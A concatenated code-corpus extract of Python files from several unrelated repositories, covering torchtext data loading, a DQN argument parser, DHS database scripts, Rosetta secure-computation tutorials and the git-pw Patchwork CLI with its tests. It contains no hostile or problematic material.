from torch.nn.utils.rnn import pad_sequence
tokenizer = get_tokenizer('basic_english')
train_iter = IMDB(split='train')
counter = Counter()
for (label, line) in train_iter:
counter.update(tokenizer(line))
vocab = Vocab(counter, min_freq=10, specials=('<unk>', '<BOS>', '<EOS>', '<PAD>'))
text_transform = lambda x: [vocab['<BOS>']] + [vocab[token] for token in tokenizer(x)] + [vocab['<EOS>']]
label_transform = lambda x: 1 if x == 'pos' else 0
def collate_batch(batch):
label_list, text_list = [], []
for (_label, _text) in batch:
label_list.append(label_transform(_label))
processed_text = torch.tensor(text_transform(_text))
text_list.append(processed_text)
return torch.tensor(label_list), pad_sequence(text_list, padding_value=3.0)
train_iter = IMDB(split='train')
train_dataloader = DataLoader(list(train_iter), batch_size=2, shuffle=True,
collate_fn=collate_batch)
print(next(iter(train_dataloader)))
```
#### File: src/datamodules/scratch_torchtext4.py
```python
import torchtext
import torch
from torchtext.datasets import IMDB, AG_NEWS
from torchtext.data.utils import get_tokenizer
from collections import Counter
from torchtext.vocab import Vocab, build_vocab_from_iterator
from torch.utils.data import DataLoader
from torch.nn.utils.rnn import pad_sequence
from torchtext.vocab import GloVe
import torch.nn as nn
import numpy as np
tokenizer = get_tokenizer('basic_english')
train_iter = AG_NEWS(split='train')
def yield_tokens(data_iter):
for _, text in data_iter:
yield tokenizer(text)
vocab = build_vocab_from_iterator(yield_tokens(train_iter), specials=["<unk>"])
vocab.set_default_index(vocab["<unk>"])
emb_dim = 100
# get pretrained glove vectors
glove = GloVe(name = '6B',
dim = emb_dim)
# create a tensor used for holding the pre-trained vectors for each element of the vocab
pretrained_embedding = torch.zeros(len(vocab), emb_dim)
# get the pretrained vector's vocab, Dict[str, int]
# pretrained_vocab = glove.vectors.get_stoi()
pretrained_vocab = glove.stoi
for idx, token in enumerate(vocab.get_itos()):
if token in pretrained_vocab:
pretrained_vector = glove[token] # pretrained_vector is a FloatTensor pre-trained vector for `token`
pretrained_embedding[idx] = pretrained_vector # update the appropriate row in pretrained_embedding
print(pretrained_embedding[1])
class SentimentLSTM(nn.Module):
def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, drop_p = 0.8):
super().__init__()
self.n_vocab = n_vocab
self.n_layers = n_layers
self.n_hidden = n_hidden
self.embedding = nn.Embedding(n_vocab, n_embed)
self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p)
self.dropout = nn.Dropout(drop_p)
self.fc = nn.Linear(n_hidden, n_output)
self.sigmoid = nn.Sigmoid()
def forward (self, input_words):
embedded_words = self.embedding(input_words)
lstm_out, h = self.lstm(embedded_words)
lstm_out = self.dropout(lstm_out)
lstm_out = lstm_out.contiguous().view(-1, self.n_hidden)
fc_out = self.fc(lstm_out)
sigmoid_out = self.sigmoid(fc_out)
sigmoid_out = sigmoid_out.view(batch_size, -1)
sigmoid_last = sigmoid_out[:, -1]
return sigmoid_last, h
def init_hidden (self, batch_size):
device = "cpu"
weights = next(self.parameters()).data
h = (weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device),
weights.new(self.n_layers, batch_size, self.n_hidden).zero_().to(device))
return h
nb_samples = 100
features = torch.randint(0, 10000, (nb_samples, 2))
labels = torch.empty(nb_samples, dtype=torch.long).random_(10)
dataset = torch.utils.data.TensorDataset(features, labels)
loader = DataLoader(
dataset,
batch_size=2
)
def pad_text(txt, seq_length):
if len(txt) >= seq_length:
res = txt[:seq_length]
else:
res = ['']*(seq_length-len(txt)) + txt
return res
def convert_unknowns(list_input, unknown_index):
return list(map(lambda x: unknown_index if x=="" else x, list_input))
def tpipeline(x,seq_length, unknown_index=0):
res = vocab(tokenizer(x))
res = pad_text(res, seq_length)
res = map(lambda x: 0 if x=="" else x, res)
return list(res)
def tpipeline_testing(x,seq_length, unknown_index=0):
res = pad_text(x, seq_length)
res = list(map(lambda x: unknown_index if x=="" else x, res))
return res
text_pipeline = lambda x: vocab(tokenizer(x))
label_pipeline = lambda x: x.long()
class MyCollator(object):
def __init__(self, seq_length):
self.seq_length = seq_length
def __call__(self, batch):
label_list, text_list = [], []
for (_label, _text) in batch:
label_list.append(label_pipeline(_label))
processed_text = torch.tensor(tpipeline(_text, self.seq_length), dtype=torch.int64)
text_list.append(processed_text)
label_list = torch.tensor(label_list, dtype=torch.int64)
text_list = torch.tensor(text_list, dtype=torch.float32 )
return text_list, label_list
class MyOtherCollator(object):
def __init__(self, seq_length, unknown_index=0):
self.seq_length = seq_length
self.unknown_index = unknown_index
def __call__(self, batch):
text, label = list(zip(*batch))
texts = list(map(lambda x: x.tolist(), text))
#texts = list(map(lambda x: vocab(tokenizer(x)), texts))
texts = list(map(lambda x: pad_text(x, self.seq_length), texts))
texts = list(map(lambda x: convert_unknowns(x, self.unknown_index), texts))
ttexts = list(map(lambda x: torch.LongTensor(x), texts))
return torch.stack(ttexts), torch.stack(label)
collate_batch = MyOtherCollator(5, 0)
dataloader = DataLoader(dataset, batch_size=8, shuffle=False, collate_fn=collate_batch)
dl_without_collate = DataLoader(dataset, batch_size=8, shuffle=False)
print(next(iter(dataloader)))
print(next(iter(dl_without_collate)))
``` |
{
"source": "00krishna-research/lightning-rl-deep-q-learning",
"score": 3
} |
#### File: src/common/cli.py
```python
import argparse
def add_base_args(parent) -> argparse.ArgumentParser:
"""
Adds arguments for DQN model
Note: these params are fine tuned for Pong env
Args:
parent
"""
arg_parser = argparse.ArgumentParser(parents=[parent])
arg_parser.add_argument("--algo", type=str, default="dqn", help="algorithm to use for training")
arg_parser.add_argument("--batch_size", type=int, default=32, help="size of the batches")
arg_parser.add_argument("--lr", type=float, default=1e-4, help="learning rate")
arg_parser.add_argument("--env", type=str, default="PongNoFrameskip-v4", help="gym environment tag")
arg_parser.add_argument("--gamma", type=float, default=0.99, help="discount factor")
arg_parser.add_argument("--episode_length", type=int, default=500, help="max length of an episode")
arg_parser.add_argument("--max_episode_reward", type=int, default=18,
help="max episode reward in the environment")
arg_parser.add_argument("--max_steps", type=int, default=500000,
help="max steps to train the agent")
arg_parser.add_argument("--n_steps", type=int, default=4,
help="how many steps to unroll for each update")
arg_parser.add_argument("--gpus", type=int, default=1,
help="number of gpus to use for training")
arg_parser.add_argument("--seed", type=int, default=123,
help="seed for training run")
arg_parser.add_argument("--backend", type=str, default="dp",
help="distributed backend to be used by lightning")
return arg_parser
``` |
{
"source": "00krishna-sandbox/gdelt",
"score": 3
} |
#### File: gdelt/geo/test_geo.py
```python
import pytest
from shapely.geometry import shape, Point
# from geo.point_in_geojson import point_to_iraq
from geo import point_to_iraq
# @pytest.fixture
def test_nineveh():
p = Point((42.451171875, 35.82672127366604))
properties = point_to_iraq(p)
assert properties['name:en'] == 'Nineveh'
# @pytest.fixture
def test_al_anbar():
# "Al Anbar"
p = Point((41.484375, 32.32427558887655))
properties = point_to_iraq(p)
assert properties['name:en'] == 'Al Anbar'
# @pytest.fixture
def test_diyala():
# Diyala
p = Point((45.120849609375, 33.86129311351553))
properties = point_to_iraq(p)
assert properties['name:en'] == 'Diyala'
``` |
{
"source": "00krishna-tools/pydhs",
"score": 3
} |
#### File: pydhs/scripts/1_prepare_database_for_processing.py
```python
from pydhs.Database import DatabasePsycopg2
from pydhs.Database import DatabaseSqlalchemy
from pydhs.Controller import Controller
from pydhs.controller_stored_procedures import Controller_stored_procedures
def main(database, tablefile):
c = Controller(database)
## function to add table names to each table.
c.action_add_table_name_to_each_database_table(tablefile)
## Function to convert table names to lower case
c.action_set_table_names_to_lowercase()
## Function to convert column names to lower case
c.action_set_field_names_to_lowercase()
def main_births(database, tablefile, variablefile):
c = Controller(database)
c.action_add_list_of_variables_to_all_tables(tablefile, variablefile)
def load_stored_procedures(database):
c = Controller_stored_procedures(database)
c.add_four_digit_function()
c.add_wealth_v190_recode_function()
if __name__ == "__main__":
# execute only if run as a script
main('db_dhs_global', 'tablelists/tablelist_all.csv')
main_births('db_dhs_global', 'tablelists/tablelist_br.csv', 'variable_lists/added_variables_birth_table.csv')
load_stored_procedures('db_dhs_global')
```
#### File: pydhs/scripts/5_merge_wealth_to_births.py
```python
from pydhs.Database import DatabasePsycopg2
from pydhs.Database import DatabaseSqlalchemy
from pydhs.Controller import Controller
def main_merge(database):
c = Controller(database)
c.action_merge_wealth_data_into_birth_table()
c.action_merge_wealth_data_into_birth_table_egypt()
c.action_merge_wealth_data_into_birth_table_philippines()
c.action_merge_wealth_data_into_birth_table_indonesia()
print('merge of wealth and birth data completed.')
if __name__ == "__main__":
main_merge('db_dhs_global')
```
#### File: pydhs/scripts/standardize_cleanup_vars.py
```python
from pydhs.Database import DatabasePsycopg2
from pydhs.Database import DatabaseSqlalchemy
from pydhs.Controller import Controller
def main(database):
c = Controller(database)
c.action_standardize_fields()
if __name__ == "__main__":
# execute only if run as a script
main('db_antonio_india')
```
#### File: pydhs/scripts/test_scripts.py
```python
from pydhs.controller_countrydata import Controller_countrydata
def main_add_country_data(database):
d = Controller_countrydata(database)
#d.action_add_column_iso3_to_intersection_table()
#d.action_update_iso3_codes_for_country_data()
d.get_country_column_names_and_add_to_intersection_table()
print(d.create_query_for_merging_country_data_into_intersection_table())
d.merge_country_data_into_intersection_table()
print('completed addition of country data.')
if __name__ == "__main__":
main_add_country_data('db_dhs_global')
``` |
{
"source": "00make/Rosetta-zh",
"score": 2
} |
#### File: tutorials/code/model_plot.py
```python
import re
import matplotlib.pyplot as plt
import os
import sys
import csv
import tensorflow as tf
import numpy as np
from util import read_dataset, savecsv, loadcsv
import pandas as pd
import argparse
pd.set_option('display.width', 1000)
np.set_printoptions(suppress=True)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
np.random.seed(0)
def getids(rootdir):
lists = os.listdir(rootdir)
ids = []
for i in range(0, len(lists)):
path = os.path.join(rootdir, lists[i])
if os.path.isdir(path):
continue
filename = lists[i]
m = re.match(r'(tf|rtt)-(\d+|real|pred)-(W|Y|b).csv', filename)
if m is None:
continue
if m[1] == 'tf' and m[3] == 'W':
ids.append(m[2])
ids.sort()
return ids
def cope_diff(tf_file, rtt_file):
val_tf = loadcsv(tf_file).reshape(-1, 1)
val_rtt = loadcsv(rtt_file).reshape(-1, 1)
val_rtt[abs(val_rtt) < 1e-5] = 1e-5
epoch_index = np.full(val_tf.shape, i)
diff_div = val_tf/val_rtt
diff_sub = val_tf - val_rtt
diff_percent = (val_tf - val_rtt) / val_rtt
cc = np.hstack((epoch_index, val_tf, val_rtt,
diff_sub, diff_percent, diff_div))
return cc
# ################################################## Args
parser = argparse.ArgumentParser(description="Model Plot")
parser.add_argument('--sname', type=str, help="script name", required=True)
args, unparsed = parser.parse_known_args()
# ##################################################
csvprefix = "./log/" + args.sname
tfdir = "./log/tf-" + args.sname
rttdir = "./log/rtt-" + args.sname
ids = getids(tfdir)
tf_real = tfdir + '/tf-real-Y.csv'
tf_pred = tfdir + '/tf-pred-Y.csv'
rt_pred = rttdir + '/rtt-pred-Y.csv'
tf_W = []
tf_b = []
rt_W = []
rt_b = []
for id_ in ids:
tf_W.append('{}/tf-{}-W.csv'.format(tfdir, id_))
tf_b.append('{}/tf-{}-b.csv'.format(tfdir, id_))
rt_W.append('{}/rtt-{}-W.csv'.format(rttdir, id_))
rt_b.append('{}/rtt-{}-b.csv'.format(rttdir, id_))
# #### weights & biases
diffs = None
wdiffs = None
wdiffsavg = None
bdiffs = None
for i in range(len(ids)):
weights_diff = cope_diff(tf_W[i], rt_W[i])
biases_diff = cope_diff(tf_b[i], rt_b[i])
diff = np.vstack((weights_diff, biases_diff))
if diffs is None:
diffs = diff
wdiffs = weights_diff
bdiffs = biases_diff
wdiffsavg = np.mean(weights_diff, axis=0)
else:
diffs = np.vstack((diffs, diff))
wdiffs = np.vstack((wdiffs, weights_diff))
bdiffs = np.vstack((bdiffs, biases_diff))
wdiffsavg = np.vstack(
(wdiffsavg, np.mean(weights_diff, axis=0)))
# #### save
csvprefix = "./log/" + args.sname
columns = ['epoch', 'tf', 'rtt', 'tf-rtt', '(tf-rtt)/rtt', 'tf/rtt']
# print(diffs[-DIM_NUM-1:, :])
df = pd.DataFrame(diffs, columns=columns)
df.to_csv(csvprefix+"-Wb.csv", index=False, float_format="%.10f")
# predictions
pred_diff = cope_diff(tf_pred, rt_pred)
df = pd.DataFrame(pred_diff, columns=columns)
df.to_csv(csvprefix+"-Y.csv", index=False, float_format="%.10f")
# plot
plt.title("weights tf-rtt")
plt.xlabel("iterations")
plt.plot(wdiffs[:, 3])
plt.savefig(csvprefix+"-W-diff.png")
plt.clf()
plt.title("weights (tf-rtt)/rtt")
plt.xlabel("iterations")
plt.plot(wdiffs[:, 4])
plt.savefig(csvprefix+"-W-diff4.png")
plt.clf()
plt.title("weights tf/rtt")
plt.xlabel("iterations")
plt.plot(wdiffs[:, 5])
plt.savefig(csvprefix+"-W-diff5.png")
plt.clf()
# plot
plt.title("bias tf-rtt")
plt.xlabel("iterations")
plt.plot(bdiffs[:, 3])
plt.savefig(csvprefix+"-b-diff.png")
plt.clf()
plt.title("bias (tf-rtt)/rtt")
plt.xlabel("iterations")
plt.plot(bdiffs[:, 4])
plt.savefig(csvprefix+"-b-diff4.png")
plt.clf()
plt.title("bias tf/rtt")
plt.xlabel("iterations")
plt.plot(bdiffs[:, 5])
plt.savefig(csvprefix+"-b-diff5.png")
plt.clf()
# plot
plt.title("predict tf-rtt")
plt.xlabel("samples")
plt.plot(pred_diff[:, 3])
plt.savefig(csvprefix+"-Y-diff.png")
plt.clf()
plt.title("predict (tf-rtt)/rtt")
plt.xlabel("samples")
plt.plot(pred_diff[:, 4])
plt.savefig(csvprefix+"-Y-diff4.png")
plt.clf()
plt.title("predict tf/rtt")
plt.xlabel("samples")
plt.plot(pred_diff[:, 5])
plt.savefig(csvprefix+"-Y-diff5.png")
plt.clf()
```
#### File: tutorials/code/rtt-ds-lr.py
```python
import argparse
import csv
import math
import os
import sys
import time
import latticex.rosetta as rtt # difference from tensorflow
import numpy as np
import pandas as pd
import tensorflow as tf
rtt.activate("SecureNN")
mpc_player_id = rtt.py_protocol_handler.get_party_id()
print("mpc_player_id:", mpc_player_id)
np.set_printoptions(suppress=True)
np.random.seed(0)
EPOCHES = 1
BATCH_SIZE = 32
learning_rate = 0.03125
DIM_NUM = 11
ROW_NUM = 1279
file_x = ""
file_y = ""
filex_name = "cls_train_x.csv"
filey_name = "cls_train_y.csv"
file_x = "../dsets/P" + str(mpc_player_id) + "/" + filex_name
file_y = "../dsets/P" + str(mpc_player_id) + "/" + filey_name
print("file_x:", file_x)
print("file_y:", file_y)
print("DIM_NUM:", DIM_NUM)
# training dataset
dataset_x0 = rtt.PrivateTextLineDataset(
file_x, data_owner=0) # P0 hold the file_x data
dataset_x1 = rtt.PrivateTextLineDataset(
file_x, data_owner=1) # P1 hold the file_x data
dataset_y = rtt.PrivateTextLineDataset(
file_y, data_owner=0) # P0 hold the file_y data
# dataset decode
def decode_p0(line):
fields = tf.string_split([line], ',').values
fields = rtt.PrivateInput(fields, data_owner=0)
return fields
def decode_p1(line):
fields = tf.string_split([line], ',').values
fields = rtt.PrivateInput(fields, data_owner=1)
return fields
# dataset pipeline
dataset_x0 = dataset_x0 \
.map(decode_p0)\
.batch(BATCH_SIZE)
dataset_x1 = dataset_x1 \
.map(decode_p1)\
.batch(BATCH_SIZE)
dataset_y = dataset_y \
.map(decode_p0)\
.batch(BATCH_SIZE)
# make iterator
iter_x0 = dataset_x0.make_initializable_iterator()
X0 = iter_x0.get_next()
iter_x1 = dataset_x1.make_initializable_iterator()
X1 = iter_x1.get_next()
iter_y = dataset_y.make_initializable_iterator()
Y = iter_y.get_next()
# Join input X of P0 and P1, features splitted dataset
X = tf.concat([X0, X1], axis=1)
# initialize W & b
W = tf.Variable(tf.zeros([DIM_NUM, 1], dtype=tf.float64))
b = tf.Variable(tf.zeros([1], dtype=tf.float64))
# build lr model
pred_Y = tf.sigmoid(tf.matmul(X, W) + b)
dy = pred_Y - Y
dw = tf.matmul(X, dy, transpose_a=True) * (1.0 / BATCH_SIZE)
db = tf.reduce_sum(dy, axis=0) * (1.0 / BATCH_SIZE)
delta_w = dw * learning_rate
delta_b = db * learning_rate
update_w = W - delta_w
update_b = b - delta_b
# update variables
assign_update_w = tf.assign(W, update_w)
assign_update_b = tf.assign(b, update_b)
# training
init = tf.global_variables_initializer()
with tf.Session() as sess:
# init var & iter
sess.run(init)
sess.run([iter_x0.initializer, iter_x1.initializer, iter_y.initializer])
# train
start_time = time.time()
BATCHES = int(ROW_NUM / BATCH_SIZE)
for e in range(EPOCHES):
for i in range(BATCHES):
sess.run([assign_update_w, assign_update_b])
training_use_time = time.time()-start_time
print("training_use_time: {} seconds".format(training_use_time))
print(rtt.get_perf_stats(True))
rtt.deactivate()
```
#### File: tutorials/code/util.py
```python
from sklearn.metrics import mean_absolute_error, mean_squared_log_error, median_absolute_error
from sklearn.metrics import roc_auc_score, roc_curve, precision_recall_curve, auc
from sklearn.metrics import precision_score, accuracy_score, recall_score, f1_score
from sklearn.metrics import mean_squared_error, explained_variance_score, r2_score
import csv
import pandas as pd
import numpy as np
import json
def read_dataset(file_name=None):
if file_name is None:
print("Error! No file name!")
return
res_data = []
with open(file_name, 'r') as f:
cr = csv.reader(f)
for each_r in cr:
curr_r = [np.array([v], dtype=np.float_)[0] for v in each_r]
res_data.append(curr_r)
# print(each_r)
return res_data
def savecsv(file_name, tf_tensor):
"""
only for numpy.narray
"""
np.savetxt(file_name, tf_tensor, fmt="%.10f", delimiter=",")
def loadcsv(file_name):
"""
only for numpy.narray
"""
return np.loadtxt(file_name, delimiter=",")
def pretty(d):
""" d is a dict"""
return json.dumps(d, indent=2, ensure_ascii=False)
def score_logistic_regression(prediction_prob, target, n=0.005, ratio=True,
list_metrics=['tag', 'score_auc', 'score_ks',
'threshold_opt', 'score_accuracy', 'score_precision', 'score_recall',
'score_f1'], tag=''):
fpr, tpr, thresholds = roc_curve(target, prediction_prob, pos_label=1)
score_auc = auc(fpr, tpr)
crossfreq = pd.crosstab(prediction_prob[:, 0], target[:, 0])
crossdens = crossfreq.cumsum(axis=0) / crossfreq.sum()
crossdens['gap'] = abs(crossdens[0] - crossdens[1])
score_ks = crossdens[crossdens['gap'] ==
crossdens['gap'].max()]['gap'].iloc[0]
threshold_opt = thresholds[np.argmax(np.abs(tpr - fpr))]
prediction = (prediction_prob >= threshold_opt).astype('int64')
score_accuracy = accuracy_score(target, prediction)
score_precision = precision_score(target, prediction)
score_recall = recall_score(target, prediction)
score_f1 = f1_score(target, prediction)
scope = locals()
dict_evaluation_metrix = dict([(i, eval(i, scope)) for i in list_metrics])
return dict_evaluation_metrix
def score_linear_regression(y_pred, y_true, list_metrics=['tag', 'mse', 'rmse', 'mae', 'evs', 'r2'], tag=''):
mse = mean_squared_error(y_true, y_pred)
rmse = np.sqrt(mean_squared_error(y_true, y_pred))
mae = median_absolute_error(y_true, y_pred)
evs = explained_variance_score(y_true, y_pred)
r2 = r2_score(y_true, y_pred)
scope = locals()
dict_evaluation_metrix = dict([(i, eval(i, scope)) for i in list_metrics])
return dict_evaluation_metrix
``` |
{
"source": "00-matt/git-pw",
"score": 2
} |
#### File: git-pw/git_pw/shell.py
```python
import click
from git_pw import bundle as bundle_cmds
from git_pw import config
from git_pw import logger
from git_pw import patch as patch_cmds
from git_pw import series as series_cmds
CONF = config.CONF
@click.group()
@click.option('--debug', default=False, is_flag=True,
help="Output more information about what's going on.")
@click.option('--token', metavar='TOKEN', envvar='PW_TOKEN',
help="Authentication token. Defaults to the value of "
"'git config pw.token'.")
@click.option('--username', metavar='USERNAME', envvar='PW_USERNAME',
help="Authentication username. Defaults to the value of "
"'git config pw.username'.")
@click.option('--password', metavar='PASSWORD', envvar='PW_PASSWORD',
help="Authentication password. Defaults to the value of "
"'git config pw.password'.")
@click.option('--server', metavar='SERVER', envvar='PW_SERVER',
help="Patchwork server address/hostname. Defaults to the value "
"of 'git config pw.server'.")
@click.option('--project', metavar='PROJECT', envvar='PW_PROJECT',
help="Patchwork project. Defaults the value of "
"'git config pw.project'.")
@click.version_option()
def cli(debug, token, username, password, server, project):
"""git-pw is a tool for integrating Git with Patchwork.
git-pw can interact with individual patches, complete patch series, and
customized bundles. The three major subcommands are *patch*, *bundle*,
and *series*.
The git-pw utility is a wrapper which makes REST calls to the Patchwork
service. To use git-pw, you must set up your environment by configuring
your Patchwork server URL and either an API token or a username and
password. To configure the server URL, run::
git config pw.server http://pw.server.com/path/to/patchwork
To configure the token, run::
git config pw.token token
Alternatively, you can pass these options via command line parameters or
environment variables.
For more information on any of the commands, simply pass ``--help`` to the
appropriate command.
"""
logger.configure_verbosity(debug)
CONF.debug = debug
CONF.token = token
CONF.username = username
CONF.password = password
CONF.server = server
CONF.project = project
@cli.group()
def patch():
"""Interact with patches.
Patches are the central object in Patchwork structure. A patch
contains both a diff and some metadata, such as the name, the
description, the author, the version of the patch etc. Patchwork
stores not only the patch itself but also various metadata
associated with the email that the patch was parsed from, such as
the message headers or the date the message itself was received.
"""
pass
@cli.group()
def series():
"""Interact with series.
Series are groups of patches, along with an optional cover letter.
Series are mostly dumb containers, though they also contain some
metadata themselves, such as a version (which is inherited by the
patches and cover letter) and a count of the number of patches
found in the series.
"""
pass
@cli.group()
def bundle():
"""Interact with bundles.
Bundles are custom, user-defined groups of patches. Bundles can be
used to keep patch lists, preserving order, for future inclusion in
a tree. There's no restriction of number of patches and they don't
even need to be in the same project. A single patch also can be
part of multiple bundles at the same time. An example of Bundle
usage would be keeping track of the Patches that are ready for
merge to the tree.
"""
pass
patch.add_command(patch_cmds.apply_cmd)
patch.add_command(patch_cmds.show_cmd)
patch.add_command(patch_cmds.download_cmd)
patch.add_command(patch_cmds.update_cmd)
patch.add_command(patch_cmds.list_cmd)
series.add_command(series_cmds.apply_cmd)
series.add_command(series_cmds.show_cmd)
series.add_command(series_cmds.download_cmd)
series.add_command(series_cmds.list_cmd)
bundle.add_command(bundle_cmds.apply_cmd)
bundle.add_command(bundle_cmds.show_cmd)
bundle.add_command(bundle_cmds.download_cmd)
bundle.add_command(bundle_cmds.list_cmd)
bundle.add_command(bundle_cmds.create_cmd)
bundle.add_command(bundle_cmds.update_cmd)
bundle.add_command(bundle_cmds.delete_cmd)
bundle.add_command(bundle_cmds.add_cmd)
bundle.add_command(bundle_cmds.remove_cmd)
```
#### File: git-pw/tests/test_bundle.py
```python
import unittest
from click.testing import CliRunner as CLIRunner
import mock
from git_pw import bundle
@mock.patch('git_pw.api.detail')
@mock.patch('git_pw.api.index')
class GetBundleTestCase(unittest.TestCase):
"""Test the ``_get_bundle`` function."""
def test_get_by_id(self, mock_index, mock_detail):
"""Validate using a number (bundle ID)."""
# not a valid return value (should be a JSON response) but good enough
mock_detail.return_value = 'hello, world'
result = bundle._get_bundle('123')
assert result == mock_detail.return_value, result
mock_index.assert_not_called()
mock_detail.assert_called_once_with('bundles', '123')
def test_get_by_name(self, mock_index, mock_detail):
"""Validate using a string (bundle name)."""
# not a valid return value (should be a JSON response) but good enough
mock_index.return_value = ['hello, world']
result = bundle._get_bundle('test')
assert result == mock_index.return_value[0], result
mock_detail.assert_not_called()
mock_index.assert_called_once_with('bundles', [('q', 'test')])
def test_get_by_name_too_many_matches(self, mock_index, mock_detail):
"""Validate using a string that returns too many results."""
# not valid return values (should be a JSON response) but good enough
mock_index.return_value = ['hello, world', 'uh oh']
with self.assertRaises(SystemExit):
bundle._get_bundle('test')
def test_get_by_name_too_few_matches(self, mock_index, mock_detail):
"""Validate using a string that returns too few (no) results."""
mock_index.return_value = []
with self.assertRaises(SystemExit):
bundle._get_bundle('test')
@mock.patch('git_pw.bundle._get_bundle')
@mock.patch('git_pw.api.download')
@mock.patch('git_pw.utils.git_am')
class ApplyTestCase(unittest.TestCase):
def test_apply_without_args(self, mock_git_am, mock_download,
mock_get_bundle):
"""Validate calling with no arguments."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
mock_download.return_value = 'test.patch'
runner = CLIRunner()
result = runner.invoke(bundle.apply_cmd, ['123'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'])
mock_git_am.assert_called_once_with(mock_download.return_value, ())
def test_apply_with_args(self, mock_git_am, mock_download,
mock_get_bundle):
"""Validate passthrough of arbitrary arguments to git-am."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
mock_download.return_value = 'test.patch'
runner = CLIRunner()
result = runner.invoke(bundle.apply_cmd, ['123', '-3'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'])
mock_git_am.assert_called_once_with(mock_download.return_value,
('-3',))
@mock.patch('git_pw.bundle._get_bundle')
@mock.patch('git_pw.api.download')
class DownloadTestCase(unittest.TestCase):
def test_download(self, mock_download, mock_get_bundle):
"""Validate standard behavior."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
mock_download.return_value = 'test.patch'
runner = CLIRunner()
result = runner.invoke(bundle.download_cmd, ['123'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'], output=None)
def test_download_to_file(self, mock_download, mock_get_bundle):
"""Validate downloading to a file."""
rsp = {'mbox': 'http://example.com/api/patches/123/mbox/'}
mock_get_bundle.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.download_cmd, ['123', 'test.patch'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
mock_download.assert_called_once_with(rsp['mbox'], output=mock.ANY)
assert isinstance(
mock_download.call_args[1]['output'], str,
)
class ShowTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
# Not a complete response but good enough for our purposes
rsp = {
'id': 123,
'date': '2017-01-01 00:00:00',
'web_url': 'https://example.com/bundle/123',
'name': 'Sample bundle',
'owner': {
'username': 'foo',
},
'project': {
'name': 'bar',
},
'patches': [
{
'id': 42,
'date': '2017-01-01 00:00:00',
'web_url': 'https://example.com/project/foo/patch/123/',
'msgid': '<<EMAIL>>',
'list_archive_url': None,
'name': 'Test',
'mbox': 'https://example.com/project/foo/patch/123/mbox/',
},
],
'public': True,
}
rsp.update(**kwargs)
return rsp
@mock.patch('git_pw.bundle._get_bundle')
def test_show(self, mock_get_bundle):
"""Validate standard behavior."""
rsp = self._get_bundle()
mock_get_bundle.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.show_cmd, ['123'])
assert result.exit_code == 0, result
mock_get_bundle.assert_called_once_with('123')
@mock.patch('git_pw.api.version', return_value=(1, 0))
@mock.patch('git_pw.api.index')
@mock.patch('git_pw.utils.echo_via_pager')
class ListTestCase(unittest.TestCase):
@staticmethod
def _get_bundle(**kwargs):
return ShowTestCase._get_bundle(**kwargs)
@staticmethod
def _get_users(**kwargs):
rsp = {
'id': 1,
'username': 'john.doe',
}
rsp.update(**kwargs)
return rsp
def test_list(self, mock_echo, mock_index, mock_version):
"""Validate standard behavior."""
rsp = [self._get_bundle()]
mock_index.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [])
assert result.exit_code == 0, result
mock_index.assert_called_once_with('bundles', [
('q', None), ('page', None), ('per_page', None),
('order', 'name')])
def test_list_with_formatting(self, mock_echo, mock_index, mock_version):
"""Validate behavior with formatting applied."""
rsp = [self._get_bundle()]
mock_index.return_value = rsp
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [
'--format', 'simple', '--column', 'ID', '--column', 'Name'])
assert result.exit_code == 0, result
mock_echo.assert_called_once_with(mock.ANY, ('ID', 'Name'),
fmt='simple')
def test_list_with_filters(self, mock_echo, mock_index, mock_version):
"""Validate behavior with filters applied.
Apply all filters, including those for pagination.
"""
user_rsp = [self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [user_rsp, bundle_rsp]
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, [
'--owner', 'john.doe', '--owner', '2', '--limit', 1, '--page', 1,
'--sort', '-name', 'test'])
assert result.exit_code == 0, result
calls = [
mock.call('users', [('q', 'john.doe')]),
mock.call('bundles', [
('owner', 1), ('owner', '2'), ('q', 'test'), ('page', 1),
('per_page', 1), ('order', '-name')])]
mock_index.assert_has_calls(calls)
@mock.patch('git_pw.api.LOG')
def test_list_with_wildcard_filters(self, mock_log, mock_echo, mock_index,
mock_version):
"""Validate behavior with a "wildcard" filter.
Patchwork API v1.0 did not support multiple filters correctly. Ensure
the user is warned as necessary if a filter has multiple matches.
"""
people_rsp = [self._get_users(), self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [people_rsp, bundle_rsp]
runner = CLIRunner()
runner.invoke(bundle.list_cmd, ['--owner', 'john.doe'])
assert mock_log.warning.called
@mock.patch('git_pw.api.LOG')
def test_list_with_multiple_filters(self, mock_log, mock_echo, mock_index,
mock_version):
"""Validate behavior with use of multiple filters.
Patchwork API v1.0 did not support multiple filters correctly. Ensure
the user is warned as necessary if they specify multiple filters.
"""
people_rsp = [self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [people_rsp, people_rsp, bundle_rsp]
runner = CLIRunner()
result = runner.invoke(bundle.list_cmd, ['--owner', 'john.doe',
'--owner', 'user.b'])
assert result.exit_code == 0, result
assert mock_log.warning.called
@mock.patch('git_pw.api.LOG')
def test_list_api_v1_1(self, mock_log, mock_echo, mock_index,
mock_version):
"""Validate behavior with API v1.1."""
mock_version.return_value = (1, 1)
user_rsp = [self._get_users()]
bundle_rsp = [self._get_bundle()]
mock_index.side_effect = [user_rsp, bundle_rsp]
